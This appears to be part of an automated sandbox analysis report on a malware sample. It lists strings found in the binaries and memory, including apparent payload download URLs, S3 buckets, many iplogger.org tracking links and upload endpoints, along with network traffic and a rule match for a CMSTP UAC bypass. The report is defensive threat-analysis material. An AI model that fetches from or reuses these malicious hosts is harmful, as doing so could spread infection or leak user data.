                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarUX
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarcC:
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarffice
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rars
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.0000000001422000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar3_R
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar8
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar86)
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarM
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarP_
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.raroC:
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarq_
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarw
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:7~
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://ngdatas.pw/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386045585.000000000119E000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://parking.parklogic.com/page/enhance.js?pcId=12&domain=icodeps.com
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com//6
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmExMWVhZTUw
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/?usid=26&utid=7334446481
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/Certificates
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/_6
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.icodeps.com/osoft
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.icodeps.com/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.icodeps.com/77
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.icodeps.com/W7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.icodeps.com/o7
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.activestate.com
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.activestate.comHolger
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.baanboard.com
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.baanboard.comBrendon
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExe
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.develop.com
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.develop.comDeepak
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.lua.org
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://www.mkpmc.com
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: http://www.mkpmc.com/Home/Index/getdata
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.rftp.com
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.rftp.comJosiah
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.scintilla.org
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.scintilla.org/scite.rng
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.spaceblue.com
                        Source: SciTE.exe.6.drString found in binary or memory: http://www.spaceblue.comMathias
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://gady45.s3.amazonaws.com/sadjj6
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/12QMs7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/12TMs7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/143up7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/14Jup7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/169Bx7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1746b7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1756b7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/19iM77
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1BBCf7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1CDGu7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1CUGu7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Cr3a7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1E2ma7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1ELna7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1G7Sc7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1GWfv7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1GaLz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Gbzj7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Gczj7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Ghzj7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1GiLz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Gjzj7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1H3Fa7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1HQGc7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1HWGc7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1J2q67
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1J9q67
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1JD967
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Jeq67
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1LvRk7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1NaYz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1NpYz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1NsYz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1NuYz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1NyYz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Pdet7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1RWXp7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1SWks7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Smzs7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Sxzs7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1TBch7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1TCch7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1TW3i7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1TXch7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Tkij7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1VPXi7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1XJq97
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1YkFc7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1Z7qd7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1b4887
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1bV787
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1fHtp7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1ibws7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1lcZz
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1mxKf7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1pcji7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1pdxr7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1q6Jt7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1rDMq7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1rd8N6
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1rqRg7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1s4qp7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1s5qp7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1spuy7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1uS4i7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1uW6i7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1vb2Q7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1vk2Q7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1vv2Q7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1vx2Q7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1x5bg7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1xWbz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://iplogger.org/1xvbz7
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com%
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://prntscr.com/upload.php
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://prntscr.com/upload.phphttps://prntscr.com/upload.php
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4Datam
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5https
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://sm.ms/api/v2/upload?inajax=1
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trkpcy.net/track.
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.amazon.com/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.aol.com
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.google.com
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.google.com/search?q=admob&oq=admob
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.icodeps.com/
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.icodeps.com/d
                        Source: SciTE.exe.6.drString found in binary or memory: https://www.smartsharesystems.com/
                        Source: SciTE.exe.6.drString found in binary or memory: https://www.smartsharesystems.com/Morten
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownHTTPS traffic detected: 172.232.25.148:443 -> 192.168.2.7:49700 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.7:49703 version: TLS 1.2
                        Source: SciTE.exe.6.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_ec2f75f6-e

                        System Summary

                        barindex
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: section name: =Jcu
                        Source: MyProg.exe.6.drStatic PE information: section name: Y|uR
                        Source: MDSxhU.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAE1204_2_00BAE120
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C181394_2_00C18139
